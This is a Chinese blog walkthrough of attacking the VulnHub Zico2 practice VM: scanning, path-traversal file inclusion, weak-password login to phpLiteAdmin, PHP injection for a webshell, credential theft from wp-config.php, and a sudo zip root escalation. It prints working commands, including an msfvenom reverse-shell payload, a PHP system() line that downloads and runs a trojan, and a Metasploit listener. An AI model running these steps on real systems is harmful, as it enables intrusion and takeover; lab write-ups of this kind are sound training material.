其他分享
首页 > 其他分享> > 靶机渗透实战(1)–zico2渗透实战

靶机渗透实战(1)–zico2渗透实战

作者:互联网

靶机下载地址为:https://download.vulnhub.com/zico/zico2.ova

Kali攻击机IP地址:192.168.49.235

Zico2靶机IP:192.168.49.30

目录

信息收集

首先查看自己IP地址如下图,IP地址是192.168.49.235
在这里插入图片描述

使用netdiscover命令来查看本地存活的IP地址

netdiscover -i eth0 -r 192.168.49.0/24

靶机的IP地址是:192.168.49.30
在这里插入图片描述

端口扫描

使用masscan来扫描端口

但是我不知道为什么我这扫不出来
在这里插入图片描述
使用nmap来扫描开放的端口,nmap有些时候扫不全

开放的端口有22,80,111
在这里插入图片描述

80为http端口我们直接用IP地址访问,然后乱点一通,发现没啥东西

然后在一个URL上面发现了类似于"?page="的东西,可能有文件包含

如下红圈
在这里插入图片描述
读取一下/etc/passwd,发现读取不出来,可能是不在这个目录,输入一堆"…/"

发现能成功读取出来证明有文件读取漏洞
在这里插入图片描述

目录扫描

使用命令dirb IP地址或者域名来扫描

dirb http://192.168.49.30

发现出来一堆
在这里插入图片描述
http://192.168.49.30/css
在这里插入图片描述
访问dbname的时候发现是个数据库后台地址

在这里插入图片描述

渗透测试

发现CMS是phpLiteAdmin

我们使用命令searchsploit命令来查找这个CMS是否有啥漏洞

是有远程命令执行漏洞
在这里插入图片描述
刚才发现的dbadmin直接访问里面的php,我们先使用弱密码来登录,比如admin,或者123456之类的密码

发现就进去了???这估计是我进的最快的一次,弱密码是admin

如果出不来,可以用弱密码爆破
在这里插入图片描述
如果进了后台我们先查看自带的数据库里面的内容

如下,发现出现了root密码和zico的密码,密码被md5加密了

我们使用在线网站解密如下
在线解密

解密出来分别是

账户root 密码 34kroot34
账户Zico 密码 zico2215@

在这里插入图片描述
SSH尝试远程登录

发现两个账户登录都全部失败
在这里插入图片描述
只能另寻出路

前面发现了文件包含和php命令执行,下面说思路

第一个方法是中国菜刀,第二个方法是KALI生成一个Linux的shell木马,然后让靶机下载并且运行木马,但是在此之前先要验证一下

先在数据库里面创建一个数据库 > 创建表
在这里插入图片描述
内容是:<?php info();?>

作用是测试是否执行了phpinfo的信息
在这里插入图片描述
查看字段内容
在这里插入图片描述
在这里插入图片描述
就在刚才发现的文件包含那边读取一下

http://192.168.49.30/view.php?page=…/…/…/…/usr/databases/msf

成功能访问出phpinfo()
在这里插入图片描述

中国菜刀

如果能像上面一样执行,那我们就可以写入一句话木马然后用菜刀来连接了

新建一个数据库 > 创建表 >插入数据,操作和上面一样,如下图
在这里插入图片描述
最后我们在访问试试,菜刀连接成功,接下来就可以随意访问了,测试之后,发现root目录进不去其他都可以
在这里插入图片描述
经过测试在home/Zico下发现了可利用的东西

发现了wordpress目录

一般在wordpress里面有个配置文件叫做wp-config.php的文件

这个文件有记录了数据库的信息密码之类的东西
在这里插入图片描述
打开wp-config.php
在这里插入图片描述
发现了账户和密码

账户是:zico 密码是:sWfCsfJSPV9H3AmQzw8

就可以使用这个账户密码去SSH连接试试了

但是我最开始以为这个密码需要解密,结果不需要
在这里插入图片描述
SSH连接成功
在这里插入图片描述
就可以开始提权操作

touch 1.txt
sudo -u root zip 1.zip 1.txt -T --unzip-command="sh -c /bin/bash"

提权成功flag就在root目录下面

木马操作

因为靶机要从我们KALI下载文件,所以我们要在KALI上面开启http服务

开启apach2:service apach2 start

然后进入网站目录

cd /var/www/html

然后在html目录里面生成木马

msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.49.235 LPORT=4444 -f elf -o shell

在这里插入图片描述
和上面一样创建一个数据库和表内容写入的是

<?php system("cd /tmp;wget http://192.168.49.30/muma;chmod 777 muma;./muma");?>

意思就是先进入tmp目录,因为tmp目录有运行存在,然后wget下载KALI的木马,然后chmod 777给muma赋值777的权限,然后./muma,运行木马

最后会在KALI里面返回webshell
在这里插入图片描述
然后在KALI里面打开msf工具

命令如下,然后就开启了监听

msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.204.155
LHOST => 192.168.204.155
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.204.155:4444

这时候我们就可以直接去访问一下刚才在数据库上的木马文件
在这里插入图片描述
然后查看监听状态,发现返回了meterpreter
在这里插入图片描述
输入命令shell,将shell修改为交互式tty

python -c 'import pty;pty.spawn("/bin/bash")'

提权

然后就和上面菜刀操作一样

进入Zico目录下面的 wordpress目录里面的wp-config.php目录查看账户和密码就能登录Zico账户,之后的操作就和菜刀操作一样了

标签:实战,渗透,192.168,zico2,密码,木马,IP地址,msf,目录
来源: https://blog.csdn.net/kengkeng123qwe/article/details/120798176